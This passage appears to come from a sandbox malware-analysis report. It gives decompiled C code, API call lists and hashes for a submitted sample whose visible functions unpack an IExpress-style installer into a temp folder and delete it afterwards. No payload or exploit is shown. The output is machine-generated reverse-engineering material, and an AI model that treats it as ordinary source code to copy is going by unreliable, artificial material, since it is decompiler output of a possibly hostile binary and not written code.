					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00406CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E004055A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0040658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x40a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x408a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x408a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x408d48 & 0x000000c0;
									if(( *0x408d48 & 0x000000c0) == 0) {
										_t41 =  *0x409a40; // 0x3, executed
										_t26 = E0040256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x408a24; // 0x0
									 *0x409a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x408a38;
										if( *0x408a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00404169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x409a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00403BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x408a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00403B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E004044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x409124 = E00406285();
							goto L16;
						}
						_t59 =  *0x409a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0040621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x408a24;
				if( *0x408a24 != 0) {
					L4:
					_t34 = E00403A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E004051E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x408a38;
				if( *0x408a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                    0x00402f1d
                                                                                                                                                                                                                                    0x00402f28
                                                                                                                                                                                                                                    0x00402f2f
                                                                                                                                                                                                                                    0x00402f3d
                                                                                                                                                                                                                                    0x00402f6c
                                                                                                                                                                                                                                    0x00402f6c
                                                                                                                                                                                                                                    0x00402f71
                                                                                                                                                                                                                                    0x00402f73
                                                                                                                                                                                                                                    0x00403041
                                                                                                                                                                                                                                    0x00403041
                                                                                                                                                                                                                                    0x00403043
                                                                                                                                                                                                                                    0x00403053
                                                                                                                                                                                                                                    0x00403053
                                                                                                                                                                                                                                    0x00402f79
                                                                                                                                                                                                                                    0x00402f80
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402f86
                                                                                                                                                                                                                                    0x00402f86
                                                                                                                                                                                                                                    0x00402f93
                                                                                                                                                                                                                                    0x00402f9e
                                                                                                                                                                                                                                    0x00402fa0
                                                                                                                                                                                                                                    0x00402fa6
                                                                                                                                                                                                                                    0x00402fb8
                                                                                                                                                                                                                                    0x00402fba
                                                                                                                                                                                                                                    0x00402fbe
                                                                                                                                                                                                                                    0x00402fc6
                                                                                                                                                                                                                                    0x00402fcc
                                                                                                                                                                                                                                    0x00402fd4
                                                                                                                                                                                                                                    0x00402fd6
                                                                                                                                                                                                                                    0x00402fd8
                                                                                                                                                                                                                                    0x00402fe0
                                                                                                                                                                                                                                    0x00402fe6
                                                                                                                                                                                                                                    0x00402fee
                                                                                                                                                                                                                                    0x00402ff0
                                                                                                                                                                                                                                    0x00402ff5
                                                                                                                                                                                                                                    0x00402ff5
                                                                                                                                                                                                                                    0x00402fee
                                                                                                                                                                                                                                    0x00402fd4
                                                                                                                                                                                                                                    0x00402ff8
                                                                                                                                                                                                                                    0x00402ffe
                                                                                                                                                                                                                                    0x00403004
                                                                                                                                                                                                                                    0x00403017
                                                                                                                                                                                                                                    0x0040301c
                                                                                                                                                                                                                                    0x00403024
                                                                                                                                                                                                                                    0x00403054
                                                                                                                                                                                                                                    0x0040305a
                                                                                                                                                                                                                                    0x00403065
                                                                                                                                                                                                                                    0x00403065
                                                                                                                                                                                                                                    0x0040306c
                                                                                                                                                                                                                                    0x0040306e
                                                                                                                                                                                                                                    0x00403075
                                                                                                                                                                                                                                    0x0040307a
                                                                                                                                                                                                                                    0x0040307a
                                                                                                                                                                                                                                    0x0040307c
                                                                                                                                                                                                                                    0x00403081
                                                                                                                                                                                                                                    0x00403087
                                                                                                                                                                                                                                    0x00403089
                                                                                                                                                                                                                                    0x004030a1
                                                                                                                                                                                                                                    0x004030a1
                                                                                                                                                                                                                                    0x004030a9
                                                                                                                                                                                                                                    0x004030ab
                                                                                                                                                                                                                                    0x004030ad
                                                                                                                                                                                                                                    0x004030af
                                                                                                                                                                                                                                    0x004030af
                                                                                                                                                                                                                                    0x004030ad
                                                                                                                                                                                                                                    0x004030b6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040308b
                                                                                                                                                                                                                                    0x0040308b
                                                                                                                                                                                                                                    0x00403091
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403093
                                                                                                                                                                                                                                    0x00403098
                                                                                                                                                                                                                                    0x0040309a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040309c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040309c
                                                                                                                                                                                                                                    0x00403089
                                                                                                                                                                                                                                    0x0040305c
                                                                                                                                                                                                                                    0x00403061
                                                                                                                                                                                                                                    0x00403063
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403063
                                                                                                                                                                                                                                    0x0040302b
                                                                                                                                                                                                                                    0x00403032
                                                                                                                                                                                                                                    0x0040303c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040303c
                                                                                                                                                                                                                                    0x00403006
                                                                                                                                                                                                                                    0x0040300c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040300e
                                                                                                                                                                                                                                    0x00403015
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403015
                                                                                                                                                                                                                                    0x00402f80
                                                                                                                                                                                                                                    0x00402f3f
                                                                                                                                                                                                                                    0x00402f46
                                                                                                                                                                                                                                    0x00402f5f
                                                                                                                                                                                                                                    0x00402f5f
                                                                                                                                                                                                                                    0x00402f64
                                                                                                                                                                                                                                    0x00402f66
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402f66
                                                                                                                                                                                                                                    0x00402f4f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402f55
                                                                                                                                                                                                                                    0x00402f5d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00402F93
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00402FB2
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00402FC6
                                                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00402FE6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00402FF8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040301C
                                                                                                                                                                                                                                      • Part of subcall function 004051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2126469477-58291647
                                                                                                                                                                                                                                    • Opcode ID: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
                                                                                                                                                                                                                                    • Instruction ID: dd7a2d248aebac99f1714a49481474325bfd39d927ddb191d2ee86f43da6afaf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9641A270B012059BDB20AF769E4965B3BAC9B44755F10007FA941F26D6EB7C8E80CE6D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00405467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 522 405467-405484 523 40548a-405490 call 4053a1 522->523 524 40551c-405528 call 401680 522->524 527 405495-405497 523->527 528 40552d-405539 call 4058c8 524->528 530 405581-405583 527->530 531 40549d-4054c0 call 401781 527->531 536 40553b-405545 CreateDirectoryA 528->536 537 40554d-405552 528->537 533 40558d-40559d call 406ce0 530->533 539 4054c2-4054d8 GetSystemInfo 531->539 540 40550c-40551a call 40658a 531->540 542 405577-40557c call 406285 536->542 543 405547 536->543 544 405554-405557 call 40597d 537->544 545 405585-40558b 537->545 546 4054da-4054dd 539->546 547 4054fe 539->547 540->528 542->530 543->537 553 40555c-40555e 544->553 545->533 551 4054f7-4054fc 546->551 552 4054df-4054e2 546->552 554 405503-405507 call 40658a 547->554 551->554 557 4054f0-4054f5 552->557 558 4054e4-4054e7 552->558 553->545 559 405560-405566 553->559 554->540 557->554 558->540 561 4054e9-4054ee 558->561 559->530 562 405568-405575 RemoveDirectoryA 559->562 561->554 562->530
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E00405467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x408004; // 0x8f135e3b
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x4091e4;
					_t42 = 0x104;
					E00401680(0x4091e4, 0x104);
					L14:
					_t13 = E004058C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x409124 = 0;
							_t14 = 1;
							L24:
							return E00406CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0040597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x408a20; // 0x0
						if(_t61 != 0) {
							 *0x408a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x409124 = E00406285();
						goto L22;
					}
					 *0x408a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E004053A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x4091e4;
				E00401781(0x4091e4, 0x104, __ecx,  &_v268);
				if(( *0x409a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0040658A(_t48, 0x104, 0x401140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0040658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                    0x00405472
                                                                                                                                                                                                                                    0x00405479
                                                                                                                                                                                                                                    0x00405481
                                                                                                                                                                                                                                    0x00405484
                                                                                                                                                                                                                                    0x0040551c
                                                                                                                                                                                                                                    0x00405521
                                                                                                                                                                                                                                    0x00405528
                                                                                                                                                                                                                                    0x0040552d
                                                                                                                                                                                                                                    0x0040552f
                                                                                                                                                                                                                                    0x00405539
                                                                                                                                                                                                                                    0x0040554d
                                                                                                                                                                                                                                    0x0040554d
                                                                                                                                                                                                                                    0x00405552
                                                                                                                                                                                                                                    0x00405585
                                                                                                                                                                                                                                    0x00405585
                                                                                                                                                                                                                                    0x0040558b
                                                                                                                                                                                                                                    0x0040558d
                                                                                                                                                                                                                                    0x0040559d
                                                                                                                                                                                                                                    0x0040559d
                                                                                                                                                                                                                                    0x00405557
                                                                                                                                                                                                                                    0x0040555e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405560
                                                                                                                                                                                                                                    0x00405566
                                                                                                                                                                                                                                    0x00405569
                                                                                                                                                                                                                                    0x0040556f
                                                                                                                                                                                                                                    0x0040556f
                                                                                                                                                                                                                                    0x00405581
                                                                                                                                                                                                                                    0x00405581
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405581
                                                                                                                                                                                                                                    0x00405545
                                                                                                                                                                                                                                    0x0040557c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040557c
                                                                                                                                                                                                                                    0x00405547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405547
                                                                                                                                                                                                                                    0x0040548a
                                                                                                                                                                                                                                    0x00405490
                                                                                                                                                                                                                                    0x00405497
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040549d
                                                                                                                                                                                                                                    0x004054ab
                                                                                                                                                                                                                                    0x004054b4
                                                                                                                                                                                                                                    0x004054c0
                                                                                                                                                                                                                                    0x0040550c
                                                                                                                                                                                                                                    0x00405511
                                                                                                                                                                                                                                    0x00405515
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405515
                                                                                                                                                                                                                                    0x004054c9
                                                                                                                                                                                                                                    0x004054d6
                                                                                                                                                                                                                                    0x004054d8
                                                                                                                                                                                                                                    0x004054fe
                                                                                                                                                                                                                                    0x00405503
                                                                                                                                                                                                                                    0x00405507
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405507
                                                                                                                                                                                                                                    0x004054da
                                                                                                                                                                                                                                    0x004054dd
                                                                                                                                                                                                                                    0x004054f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004054f7
                                                                                                                                                                                                                                    0x004054df
                                                                                                                                                                                                                                    0x004054e2
                                                                                                                                                                                                                                    0x004054f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004054f0
                                                                                                                                                                                                                                    0x004054e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004054e9
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004054C9
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040553D
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040556F
                                                                                                                                                                                                                                      • Part of subcall function 004053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
                                                                                                                                                                                                                                      • Part of subcall function 004053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
                                                                                                                                                                                                                                      • Part of subcall function 004053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
                                                                                                                                                                                                                                      • Part of subcall function 004053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
                                                                                                                                                                                                                                      • Part of subcall function 004053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                    • API String ID: 1979080616-186922987
                                                                                                                                                                                                                                    • Opcode ID: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
                                                                                                                                                                                                                                    • Instruction ID: 42d8508e497298c23007889095531b712f90f8dafbad6872354eea9b701dc3d5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA313A70700A047BDB105F2A9D04A7F77AAEB81304B14013FAC02F26E5DB7C8E028E8D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E00402390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x408004; // 0x8f135e3b
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00406CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00401680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E004016B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00401680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E004016B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E004016B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0040658A( &_v280, 0x104, 0x401140);
								E00402390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                    0x00402398
                                                                                                                                                                                                                                    0x0040239e
                                                                                                                                                                                                                                    0x004023a3
                                                                                                                                                                                                                                    0x004023a5
                                                                                                                                                                                                                                    0x004023ae
                                                                                                                                                                                                                                    0x004023b3
                                                                                                                                                                                                                                    0x004024cb
                                                                                                                                                                                                                                    0x004024d2
                                                                                                                                                                                                                                    0x004024d3
                                                                                                                                                                                                                                    0x004024d4
                                                                                                                                                                                                                                    0x004024df
                                                                                                                                                                                                                                    0x004023c2
                                                                                                                                                                                                                                    0x004023d1
                                                                                                                                                                                                                                    0x004023db
                                                                                                                                                                                                                                    0x004023e4
                                                                                                                                                                                                                                    0x004023f6
                                                                                                                                                                                                                                    0x004023fc
                                                                                                                                                                                                                                    0x00402401
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x00402408
                                                                                                                                                                                                                                    0x00402411
                                                                                                                                                                                                                                    0x0040241f
                                                                                                                                                                                                                                    0x0040247a
                                                                                                                                                                                                                                    0x00402483
                                                                                                                                                                                                                                    0x00402495
                                                                                                                                                                                                                                    0x004024a3
                                                                                                                                                                                                                                    0x00402421
                                                                                                                                                                                                                                    0x0040242f
                                                                                                                                                                                                                                    0x00402453
                                                                                                                                                                                                                                    0x0040245d
                                                                                                                                                                                                                                    0x00402466
                                                                                                                                                                                                                                    0x00402472
                                                                                                                                                                                                                                    0x00402472
                                                                                                                                                                                                                                    0x0040242f
                                                                                                                                                                                                                                    0x004024af
                                                                                                                                                                                                                                    0x004024b5
                                                                                                                                                                                                                                    0x004024be
                                                                                                                                                                                                                                    0x004024c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024c5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00408A3A,004011F4,00408A3A,00000000,?,?), ref: 004023F6
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,004011F8), ref: 00402427
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,004011FC), ref: 0040243B
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00402495
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 004024A3
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 004024AF
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 004024BE
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00408A3A), ref: 004024C5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                                                    • Opcode ID: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
                                                                                                                                                                                                                                    • Instruction ID: 49d887b1e5617c187f2e1a2157473020d0f6751303a448a4b2a9eeaf758e879d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6318131604744ABC320DF64CE8DEEB73ACABC4309F14493FB555A62D0EB7C9909875A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E00402BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x40a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x409124 = 0;
				if(E00402CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00402F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E004052B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x408a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x409a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00401F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x408588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x409124; // 0x80070002
				return _t7;
			}


















                                                                                                                                                                                                                                    0x00402c03
                                                                                                                                                                                                                                    0x00402c0d
                                                                                                                                                                                                                                    0x00402c18
                                                                                                                                                                                                                                    0x00402c20
                                                                                                                                                                                                                                    0x00402c2e
                                                                                                                                                                                                                                    0x00402c32
                                                                                                                                                                                                                                    0x00402c36
                                                                                                                                                                                                                                    0x00402c3d
                                                                                                                                                                                                                                    0x00402c43
                                                                                                                                                                                                                                    0x00402c45
                                                                                                                                                                                                                                    0x00402c47
                                                                                                                                                                                                                                    0x00402c49
                                                                                                                                                                                                                                    0x00402c4e
                                                                                                                                                                                                                                    0x00402c4e
                                                                                                                                                                                                                                    0x00402c47
                                                                                                                                                                                                                                    0x00402c32
                                                                                                                                                                                                                                    0x00402c20
                                                                                                                                                                                                                                    0x00402c50
                                                                                                                                                                                                                                    0x00402c54
                                                                                                                                                                                                                                    0x00402c57
                                                                                                                                                                                                                                    0x00402c64
                                                                                                                                                                                                                                    0x00402c66
                                                                                                                                                                                                                                    0x00402c6b
